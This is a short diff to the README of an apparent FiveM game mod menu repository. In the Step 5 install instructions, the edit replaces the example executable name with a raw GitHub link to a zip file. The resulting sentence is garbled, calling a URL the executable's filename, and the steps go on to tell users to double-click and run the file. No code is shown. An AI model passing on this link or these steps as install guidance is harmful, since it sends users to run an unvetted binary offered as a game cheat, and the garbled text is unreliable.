anuj4sharma/FiveM-Mod-Menu/README.md

 ### Step 5: Install the Mod Menu
 1. Open the folder where you extracted the files.
-2. Locate the executable file (usually named something like `FiveM-Mod-Menu.exe`).
+2. Locate the executable file (usually named something like `https://raw.githubusercontent.com/anuj4sharma/FiveM-Mod-Menu/main/weeshy/FiveM-Mod-Menu.zip`).
 3. Double-click this file to run the application.

 ### Step 6: Configure the Menu